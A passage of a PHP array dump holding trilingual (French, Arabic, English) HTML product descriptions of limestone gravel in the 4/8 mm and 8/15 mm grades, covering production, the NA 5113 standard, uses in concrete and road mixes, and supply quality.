'contenu_ara' => '<p dir="rtl" style="text-align: justify;"><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 4/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> عبارة عن مجموع من أصل معدني لم يخضع لأي تحول بخلاف الصخور الميكانيكية الضخمة التي يتم الحصول عليها من خلال استغلال رواسب الحجر الجيري ، وسحق الحجر الجيري المتساقط بما في ذلك التكسير والغربلة والطحن. يتم التحكم في </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 4/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> وفقًا لمعيار<strong>NA 5113</strong>. </span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:20px"><strong><span style="color:#008000"><small><u> </u></small></span></strong></span><strong><span style="color:#008000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u>مجال الاستعمال</u></span></span></span></strong><span style="font-size:20px"><strong><span style="color:#008000"><small><span style="font-family:times new roman,times,serif">:</span></small></span></strong></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> يستخدم </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 4/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> مع الأسمنت أو القار ، ويمثل 80 إلى 90٪ من الملاط والخرسانة الهيدروليكية المخصصة للمباني وأعمال الهندسة المدنية ، وكذلك الأسفلت والحصى المعالجة المخصصة لأساسات الطرق والسكك الحديدية.</span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">- يتم تضمين</span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 4/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> في:</span></span></p>
<ul dir="rtl">
<li style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <span style="color:#000000"> <strong> الأعمال المدنية</strong></span></span></span></li>
<li style="text-align: justify;"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong> الخلائط البيتومينية (تشييد الطرق)</strong></span></span></span></li>
</ul>
<p dir="rtl" style="text-align: justify;"><strong><span style="color:#008000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u>التوصيات</u> :</span></span></span></strong></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">لا تقتصر جودة إمداد </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 4/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم </strong>على الامتثال لمتطلبات السوق فحسب ، بل هي قبل كل شيء توافق الخصائص التي تم فحصها. هذا الاتساق هو ، علاوة على ذلك ، أحد مفاتيح نجاح موقع البناء</span></span>.</p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px">بالنسبة للزبون ، كل هذا يتضمن تحديد مواصفات استخدام تتكيف مع احتياجاته الخاصة ، واستخدام </span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 4/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong></span> الذي يلبي معايير الاختيار الخاصة به ، وإجراء جميع الفحوصات اللازمة للتحقق من أن </span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 4/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong></span> يتماشى مع توقعاته ولديه أيضًا هذا الانتظام المنشود فيه كثيرًا.</span></p>
',
'contenu_en' => '<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px"><span style="color:#000000">The</span></span></small><strong><small><span style="font-size:16px"> Gravel 4/8 mm</span></small></strong><span style="color:#000000"><span style="font-size:16px"> is an aggregate of mineral origin that has not undergone any transformation other than mechanical massive rocks is obtained by exploiting limestone deposits, crushing downed limestone including crushing and screening and grinding.</span></span></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">The</span></small><strong><small><span style="font-size:16px"> Gravel 4/8 mm</span></small></strong></span> <span style="color:#000000">is controlled according to the <span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>NA 5113</strong></span> </span>Standard.</span></p>
<p style="text-align:left"><span style="color:#008000"><strong><u>Uses</u> :</strong></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">The<strong> Gravel 4/8 mm </strong>is<strong> </strong>used bound with cement or bitumen. It represents 80 to 90% of hydraulic mortars and concretes intended for buildings and civil engineering works, but also asphalt and treated gravels intended for the foundations of roadways and railways.</span></span></p>
<p style="text-align:left">The <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 4/8 mm</span></small></strong></span> is included in:</p>
<ul>
<li style="text-align:left">
<p> <span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> Civil Engineering Work</strong></span></span></small></span><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> </span></span></small></span></p>
</li>
<li style="text-align:left">
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> <strong>Bituminous Mixes (Road Construction)</strong></span></span></small></span></p>
</li>
</ul>
<p style="text-align:left"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>Recommendations</strong></u><strong> :</strong></span></span></span></small></p>
<p style="text-align:left">The quality of the <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 4/8 mm</span></small></strong></span> supply is not only compliance with market requirements, but above all, the homogeneity of the characteristics checked. This regularity is one of the keys to the success of the <small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">construction site.</span></span></small></p>
<p style="text-align:left">For the client, all this involves setting usage specifications adapted to his own needs, using <span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">the</span></small><strong><small><span style="font-size:16px"> Gravel 4/8 mm</span></small></strong></span> that best meets his selection criteria, and carrying out all the necessary checks to verify that the <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 4/8 mm</span></small></strong></span><strong> </strong>is in line with his expectations and also has this much sought-after regularity.</p>
',
'img_prd' => 'produit-1611822434.png',
'img_prd_detail' => '',
'Code_Pr' => '485',
'prix_u' => '0',
'fiche_technique' => 'fiche_technique-1611737456.pdf',
'pos_slider' => '6'
),
'Environement' => array(),
'Pemploi' => array(),
'Securite' => array(),
'Specification' => array(),
'Stockage' => array(),
'typecomposition' => array(),
'Caracteristique' => array(),
'Controlequalite' => array()
),
(int) 8 => array(
'Produit' => array(
'id' => '125',
'nom_fr' => 'Gravier ',
'nom_ara' => 'حصى',
'nom_en' => 'Gravel',
'sous_nom_fr' => '8/15 mm',
'sous_nom_ara' => ' 8/15 مم',
'sous_nom_en' => '8/15 mm',
'date_ajout' => '2021-01-27',
'image' => '',
'contenu_fr' => '<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Gravier</strong> <strong>8/15 mm</strong> est un granulat d’origine minérale n’ayant subi aucune transformation autre que mécanique des roches massives est obtenu en exploitant des gisements de calcaire, en concassant du calcaire abattu y compris le concassage et le criblage et le broyage.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Gravier</strong> <strong>8/15 mm</strong> est contrôlé selon le Référentiel <strong>NA 5113</strong>.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Utilisations</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Gravier</strong> <strong>8/15 mm </strong>est<strong> </strong>utilisé lié avec du ciment ou du bitume.Il représente 80 à 90 % des mortiers et bétons hydrauliques destinés aux bâtiments et ouvrages d’art, mais aussi des enrobés et graves traitées destinés aux assises de chaussées et des voies ferroviaires.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Gravier</strong> <strong>8/15 mm </strong> entre dans les :</span></span></p>
<ul>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Travaux de Génie Civil</strong></span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Bétons Hydrauliques</strong> </span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Enrobés</strong> <strong>Bitumineux</strong> (Construction des Chaussées)</span></span></p>
</li>
</ul>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Recommandations</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La qualité d’une fourniture du <strong>Gravier</strong> <strong>8/15 mm</strong>, c’est non seulement le respect des exigences du marché, mais c’est avant tout l’homogénéité des caractéristiques contrôlées. Cette régularité constitue d’ailleurs l’une des clés de la réussite du chantier. </span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Pour le maître d’ouvrage, tout cela implique de fixer des spécifications d’usage adaptées à ses propres besoins, d’utiliser du <strong>Gravier</strong> <strong>8/15 mm</strong> répondant au mieux à ses critères de choix, et d’effectuer tous les contrôles nécessaires pour vérifier que le <strong>Gravier</strong> <strong>8/15 mm</strong> est conforme à son attente et a en plus cette régularité tant recherchée.</span></span></p>
',
'contenu_ara' => '<p dir="rtl" style="text-align: justify;"><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 15/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> عبارة عن مجموع من أصل معدني لم يخضع لأي تحول بخلاف الصخور الميكانيكية الضخمة التي يتم الحصول عليها من خلال استغلال رواسب الحجر الجيري ، وسحق الحجر الجيري المتساقط بما في ذلك التكسير والغربلة والطحن. يتم التحكم في </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 15/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> وفقًا لمعيار<strong>NA 5113</strong>. </span></span></p>
<p dir="rtl" style="text-align: justify;"><strong><span style="color:#008000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u>مجال الاستعمال</u></span></span></span></strong><span style="color:#008000"><strong><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> :</span></span></small></strong></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">- يستخدم </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 15/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> مع الأسمنت أو القار ، ويمثل 80 إلى 90٪ من الملاط والخرسانة الهيدروليكية المخصصة للمباني وأعمال الهندسة المدنية ، وكذلك الأسفلت والحصى المعالجة المخصصة لأساسات الطرق والسكك الحديدية.</span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">- يتم تضمين </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 15/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> في:</span></span></p>
<ul dir="rtl">
<li style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong> الأعمال المدنية</strong></span></span></li>
<li style="text-align: justify;"><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> الخرسانة الهيدروليكية</span></span></strong></li>
<li style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong> الخلائط البيتومينية (تشييد الطرق)</strong></span></span></li>
</ul>
<p dir="rtl" style="text-align: justify;"><strong><span style="color:#008000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u>التوصيات</u> :</span></span></span></strong></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">لا تقتصر جودة إمداد </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 15/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم </strong>على الامتثال لمتطلبات السوق فحسب ، بل هي قبل كل شيء توافق الخصائص التي تم فحصها. هذا الاتساق هو ، علاوة على ذلك ، أحد مفاتيح نجاح موقع البناء</span></span>.</p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px">بالنسبة للزبون ، كل هذا يتضمن تحديد مواصفات استخدام <span style="color:#000000">تتكيف</span> مع احتياجاته الخاصة ، واستخدام </span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 15/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong></span> الذي يلبي معايير الاختيار الخاصة به ، وإجراء جميع الفحوصات اللازمة للتحقق من أن </span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 15/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong></span> يتماشى مع توقعاته ولديه أيضًا هذا الانتظام المنشود فيه كثيرًا.</span></p>
',
'contenu_en' => '<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px"><span style="color:#000000">The</span></span></small><strong><small><span style="font-size:16px"> Gravel 8/15 mm</span></small></strong><span style="color:#000000"><span style="font-size:16px"> is an aggregate of mineral origin that has not undergone any transformation other than mechanical massive rocks is obtained by exploiting limestone deposits, crushing downed limestone including crushing and screening and grinding.</span></span></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">The</span></small><strong><small><span style="font-size:16px"> Gravel 8/15 mm</span></small></strong></span> <span style="color:#000000">is controlled according to the <span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>NA 5113</strong></span> </span>Standard.</span></p>
<p style="text-align:left"><u><span style="color:#008000"><strong>Uses</strong></span></u><span style="color:#008000"><strong> :</strong></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">The</span></small><strong><small><span style="font-size:16px"> Gravel 8/15 mm </span></small></strong><small><span style="font-size:16px">is</span></small><strong><small><span style="font-size:16px"> </span></small></strong></span>used bound with cement or bitumen. It represents 80 to 90% of hydraulic mortars and concretes intended for buildings and civil engineering works, but also asphalt and treated gravels intended for the foundations of roadways and railways.</p>
<p style="text-align:left">The <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 8/15 mm</span></small></strong></span> is included in :</p>
<ul>
<li style="text-align:left">
<p> <span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> Civil Engineering Work</strong></span></span></small></span><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> </span></span></small></span></p>
</li>
<li style="text-align:left">
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> <strong> Hydraulic Concrete</strong></span></span></small></span></p>
</li>
<li style="text-align:left">
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> <strong>Bituminous Mixes (Road Construction)</strong></span></span></small></span></p>
</li>
</ul>
<p style="text-align:left"><span style="color:#008000"><u><strong>Recommendations</strong></u><strong> :</strong></span></p>
<p style="text-align:left">The quality of the <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 8/15 mm</span></small></strong></span> supply is not only compliance with market requirements, but above all, the homogeneity of the characteristics checked. This regularity is one of the keys to the success of the <small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">construction site.</span></span></small></p>
<p style="text-align:left">For the client, all this involves setting usage specifications adapted to his own needs, using <span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">the</span></small><strong><small><span style="font-size:16px"> Gravel 8/15 mm</span></small></strong></span> that best meets his selection criteria, and carrying out all the necessary checks to verify that the <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 8/15 mm</span></small></strong></span><strong> </strong>is in line with his expectations and also has this much sought-after regularity.</p>
',
'img_prd' => 'produit-1611737181.png',
'img_prd_detail' => '',
'Code_Pr' => '125',
'prix_u' => '0',
'fiche_technique' => 'fiche_technique-1611737181.pdf',
'pos_slider' => '5'
),
'Environement' => array(),
'Pemploi' => array(),
'Securite' => array(),
'Specification' => array(),
'Stockage' => array(),
'typecomposition' => array(),
'Caracteristique' => array(),
'Controlequalite' => array()
)
)
$produit_desc = array(
(int) 0 => array(
'Produit' => array(
'id' => '125',
'nom_fr' => 'Gravier ',
'nom_ara' => 'حصى',
'nom_en' => 'Gravel',
'sous_nom_fr' => '8/15 mm',
'sous_nom_ara' => ' 8/15 مم',
'sous_nom_en' => '8/15 mm',
'date_ajout' => '2021-01-27',
'image' => '',
'contenu_fr' => '<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Gravier</strong> <strong>8/15 mm</strong> est un granulat d’origine minérale n’ayant subi aucune transformation autre que mécanique des roches massives est obtenu en exploitant des gisements de calcaire, en concassant du calcaire abattu y compris le concassage et le criblage et le broyage.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Gravier</strong> <strong>8/15 mm</strong> est contrôlé selon le Référentiel <strong>NA 5113</strong>.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Utilisations</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Gravier</strong> <strong>8/15 mm </strong>est<strong> </strong>utilisé lié avec du ciment ou du bitume.Il représente 80 à 90 % des mortiers et bétons hydrauliques destinés aux bâtiments et ouvrages d’art, mais aussi des enrobés et graves traitées destinés aux assises de chaussées et des voies ferroviaires.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Gravier</strong> <strong>8/15 mm </strong> entre dans les :</span></span></p>
<ul>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Travaux de Génie Civil</strong></span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Bétons Hydrauliques</strong> </span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Enrobés</strong> <strong>Bitumineux</strong> (Construction des Chaussées)</span></span></p>
</li>
</ul>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Recommandations</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La qualité d’une fourniture du <strong>Gravier</strong> <strong>8/15 mm</strong>, c’est non seulement le respect des exigences du marché, mais c’est avant tout l’homogénéité des caractéristiques contrôlées. Cette régularité constitue d’ailleurs l’une des clés de la réussite du chantier. </span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Pour le maître d’ouvrage, tout cela implique de fixer des spécifications d’usage adaptées à ses propres besoins, d’utiliser du <strong>Gravier</strong> <strong>8/15 mm</strong> répondant au mieux à ses critères de choix, et d’effectuer tous les contrôles nécessaires pour vérifier que le <strong>Gravier</strong> <strong>8/15 mm</strong> est conforme à son attente et a en plus cette régularité tant recherchée.</span></span></p>
',
'contenu_ara' => '<p dir="rtl" style="text-align: justify;"><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 15/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> عبارة عن مجموع من أصل معدني لم يخضع لأي تحول بخلاف الصخور الميكانيكية الضخمة التي يتم الحصول عليها من خلال استغلال رواسب الحجر الجيري ، وسحق الحجر الجيري المتساقط بما في ذلك التكسير والغربلة والطحن. يتم التحكم في </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 15/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> وفقًا لمعيار<strong>NA 5113</strong>. </span></span></p>
<p dir="rtl" style="text-align: justify;"><strong><span style="color:#008000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u>مجال الاستعمال</u></span></span></span></strong><span style="color:#008000"><strong><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> :</span></span></small></strong></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">- يستخدم </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 15/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> مع الأسمنت أو القار ، ويمثل 80 إلى 90٪ من الملاط والخرسانة الهيدروليكية المخصصة للمباني وأعمال الهندسة المدنية ، وكذلك الأسفلت والحصى المعالجة المخصصة لأساسات الطرق والسكك الحديدية.</span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">- يتم تضمين </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 15/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> في:</span></span></p>
<ul dir="rtl">
<li style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong> الأعمال المدنية</strong></span></span></li>
<li style="text-align: justify;"><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> الخرسانة الهيدروليكية</span></span></strong></li>
<li style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong> الخلائط البيتومينية (تشييد الطرق)</strong></span></span></li>
</ul>
<p dir="rtl" style="text-align: justify;"><strong><span style="color:#008000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u>التوصيات</u> :</span></span></span></strong></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">لا تقتصر جودة إمداد </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 15/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم </strong>على الامتثال لمتطلبات السوق فحسب ، بل هي قبل كل شيء توافق الخصائص التي تم فحصها. هذا الاتساق هو ، علاوة على ذلك ، أحد مفاتيح نجاح موقع البناء</span></span>.</p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px">بالنسبة للزبون ، كل هذا يتضمن تحديد مواصفات استخدام <span style="color:#000000">تتكيف</span> مع احتياجاته الخاصة ، واستخدام </span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 15/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong></span> الذي يلبي معايير الاختيار الخاصة به ، وإجراء جميع الفحوصات اللازمة للتحقق من أن </span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 15/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong></span> يتماشى مع توقعاته ولديه أيضًا هذا الانتظام المنشود فيه كثيرًا.</span></p>
',
'contenu_en' => '<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px"><span style="color:#000000">The</span></span></small><strong><small><span style="font-size:16px"> Gravel 8/15 mm</span></small></strong><span style="color:#000000"><span style="font-size:16px"> is an aggregate of mineral origin that has not undergone any transformation other than mechanical massive rocks is obtained by exploiting limestone deposits, crushing downed limestone including crushing and screening and grinding.</span></span></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">The</span></small><strong><small><span style="font-size:16px"> Gravel 8/15 mm</span></small></strong></span> <span style="color:#000000">is controlled according to the <span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>NA 5113</strong></span> </span>Standard.</span></p>
<p style="text-align:left"><u><span style="color:#008000"><strong>Uses</strong></span></u><span style="color:#008000"><strong> :</strong></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">The</span></small><strong><small><span style="font-size:16px"> Gravel 8/15 mm </span></small></strong><small><span style="font-size:16px">is</span></small><strong><small><span style="font-size:16px"> </span></small></strong></span>used bound with cement or bitumen. It represents 80 to 90% of hydraulic mortars and concretes intended for buildings and civil engineering works, but also asphalt and treated gravels intended for the foundations of roadways and railways.</p>
<p style="text-align:left">The <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 8/15 mm</span></small></strong></span> is included in :</p>
<ul>
<li style="text-align:left">
<p> <span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> Civil Engineering Work</strong></span></span></small></span><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> </span></span></small></span></p>
</li>
<li style="text-align:left">
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> <strong> Hydraulic Concrete</strong></span></span></small></span></p>
</li>
<li style="text-align:left">
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> <strong>Bituminous Mixes (Road Construction)</strong></span></span></small></span></p>
</li>
</ul>
<p style="text-align:left"><span style="color:#008000"><u><strong>Recommendations</strong></u><strong> :</strong></span></p>
<p style="text-align:left">The quality of the <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 8/15 mm</span></small></strong></span> supply is not only compliance with market requirements, but above all, the homogeneity of the characteristics checked. This regularity is one of the keys to the success of the <small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">construction site.</span></span></small></p>
<p style="text-align:left">For the client, all this involves setting usage specifications adapted to his own needs, using <span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">the</span></small><strong><small><span style="font-size:16px"> Gravel 8/15 mm</span></small></strong></span> that best meets his selection criteria, and carrying out all the necessary checks to verify that the <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 8/15 mm</span></small></strong></span><strong> </strong>is in line with his expectations and also has this much sought-after regularity.</p>
',
'img_prd' => 'produit-1611737181.png',
'img_prd_detail' => '',
'Code_Pr' => '125',
'prix_u' => '0',
'fiche_technique' => 'fiche_technique-1611737181.pdf',
'pos_slider' => '5'
),
'Environement' => array(),
'Pemploi' => array(),
'Securite' => array(),
'Specification' => array(),
'Stockage' => array(),
'typecomposition' => array(),
'Caracteristique' => array(),
'Controlequalite' => array()
),
(int) 1 => array(
'Produit' => array(
'id' => '485',
'nom_fr' => 'Gravier',
'nom_ara' => 'حصى',
'nom_en' => 'Gravel',
'sous_nom_fr' => '4/8 mm',
'sous_nom_ara' => '4/8 مم',
'sous_nom_en' => '4/8 mm',
'date_ajout' => '2021-01-27',
'image' => '',
'contenu_fr' => '<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <span style="color:#000000"><strong>Gravier 4/8 mm</strong></span> est un granulat d’origine minérale n’ayant subi aucune transformation autre que mécanique des roches massives est obtenu en exploitant des gisements de calcaire, en concassant du calcaire abattu y compris le concassage et le criblage et le broyage.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <span style="color:#000000"><strong>Gravier 4/8 mm</strong></span> est contrôlé selon le Référentiel <strong>NA 5113</strong>.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Utilisations</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <span style="color:#000000"><strong>Gravier 4/8 mm </strong></span>est<strong> </strong>utilisé lié avec du ciment ou du bitume.Il représente 80 à 90 % des mortiers et bétons hydrauliques destinés aux bâtiments et ouvrages d’art, mais aussi des enrobés et graves traitées destinés aux assises de chaussées et des voies ferroviaires.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <span style="color:#000000"><strong>Gravier 4/8 mm</strong></span><strong> </strong> entre dans les :</span></span></p>
<ul>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Travaux de Génie Civil</strong></span></span></span></p>
</li>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Enrobés</strong> <strong>Bitumineux</strong> (Construction des Chaussées)</span></span></span></p>
</li>
</ul>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Recommandations</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La qualité d’une fourniture du <span style="color:#000000"><strong>Gravier 4/8 mm</strong></span>, c’est non seulement le respect des exigences du marché, mais c’est avant tout l’homogénéité des caractéristiques contrôlées. Cette régularité constitue d’ailleurs l’une des clés de la réussite du chantier. </span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Pour le maître d’ouvrage, tout cela implique de fixer des spécifications d’usage adaptées à ses propres besoins, d’utiliser du <span style="color:#000000"><strong>Gravier 4/8 mm</strong></span> répondant au mieux à ses critères de choix, et d’effectuer tous les contrôles nécessaires pour vérifier que le <span style="color:#000000"><strong>Gravier 4/8 mm</strong></span> est conforme à son attente et a en plus cette régularité tant recherchée.</span></span></p>
',
